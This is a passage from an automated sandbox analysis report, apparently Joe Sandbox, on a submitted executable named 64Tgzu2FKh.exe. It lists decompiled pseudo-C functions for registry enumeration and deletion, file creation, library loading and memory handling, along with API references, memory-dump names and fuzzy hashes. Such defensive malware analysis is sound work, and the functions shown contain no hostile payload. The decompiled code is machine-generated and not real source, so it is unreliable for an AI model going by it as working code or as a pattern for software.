							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E0040624C(_t33, _t3);
							_push(_t30);
							 *0x40cdac =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E0040624C(_t36, _t30 + 4);
								_t22 =  *0x40cdac; // 0x0
								E0040624C(_t32, _t22 + 4);
								_t25 =  *0x40cdac; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E0040624C();
								L15:
								 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040626E(_t28, _t30, _t33, _t28, 0xffffffe8));
					E004058AE();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b71
0x00401b71
0x00401b74
0x00401b7c
0x00401bc5
0x00401bf3
0x00401bfc
0x00401bfe
0x00401c02
0x00401c07
0x00401c0c
0x00401c0e
0x00401bc7
0x00401bc9
0x00402885
0x00401bcf
0x00401bcf
0x00401bd4
0x00401bdb
0x00401bdc
0x00401be1
0x00401be1
0x00401bc9
0x00000000
0x00401b7e
0x00401b7e
0x00401b7e
0x00401b81
0x00000000
0x00000000
0x00401b87
0x00401b8b
0x00000000
0x00401b8d
0x00401b8f
0x00000000
0x00401b95
0x00401b95
0x00401b98
0x00401b9f
0x00401ba4
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbc
0x004029db
0x00402abf
0x00402ac2
0x00402ac8
0x00402ac8
0x00401b8f
0x00000000
0x00401b8b
0x004022de
0x004022eb
0x004022ec
0x004022f1
0x004022f1
0x00402aca
0x00402ace

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3

Strings

Call, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: cca3354bba1bf3734a7de2d1ff860a70d998943ae53f9745150d6e264a445642
Instruction ID: dcb5b8d847a710274197b3f9eb455299827833f010be51817d6ecb77aa41e574
Opcode Fuzzy Hash: cca3354bba1bf3734a7de2d1ff860a70d998943ae53f9745150d6e264a445642
Instruction Fuzzy Hash: 5021CD72700100EFDB20EBA8CE8495E76B8AF84328725417BF902F72D1DB7D98518B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024f2
0x004024f2
0x004024f2
0x004024f7
0x004024fe
0x00402500
0x00402508
0x0040250b
0x0040250e
0x00402885
0x00402514
0x0040251c
0x0040251f
0x00402538
0x0040253e
0x00402540
0x00402542
0x00402542
0x00402521
0x00402525
0x00402525
0x00402549
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
Opcode Fuzzy Hash: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69

Uniqueness

Uniqueness Score: -1.00%

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 1000295B
GetLastError.KERNEL32 ref: 10002A62

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406193(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}

0x0040247e
0x0040247e
0x00402483
0x0040248a
0x0040248c
0x00402493
0x00402496
0x00402885
0x0040249c
0x0040249f
0x004024ba
0x004024ea
0x004024ea
0x004024ed
0x004024bc
0x004024c0
0x004024d9
0x004024e0
0x004024e3
0x004024c2
0x004024c5
0x004024d0
0x00402549
0x00000000
0x00000000
0x00000000
0x004024c5
0x004024c0
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
Opcode Fuzzy Hash: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x4291ec =  *0x4291ec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x4291ec, 0x7530,  *0x4291d4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402388(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t18 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1);
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402388
0x00402388
0x0040238b
0x0040238e
0x004023cf
0x00000000
0x00402390
0x00402392
0x00402397
0x0040239b
0x00402885
0x00402885
0x004023a1
0x004023b1
0x004023b3
0x004023d1
0x004023d3
0x00000000
0x004023d9
0x004023d3
0x0040239b
0x00402ac2
0x00402ace

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
RegCloseKey.ADVAPI32(00000000), ref: 004023B3

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
Opcode Fuzzy Hash: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
Opcode Fuzzy Hash: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406626(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065B6(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040662e
0x00406631
0x00406638
0x00406640
0x0040664c
0x00000000
0x00406653
0x00406643
0x0040664a
0x00000000
0x0040665b
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
GetProcAddress.KERNEL32(00000000,?), ref: 00406653

Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D3E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d42
0x00405d4f
0x00405d64
0x00405d6a

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\64Tgzu2FKh.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D19(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d1e
0x00405d24
0x00405d29
0x00405d32
0x00405d32
0x00405d3b

APIs

GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
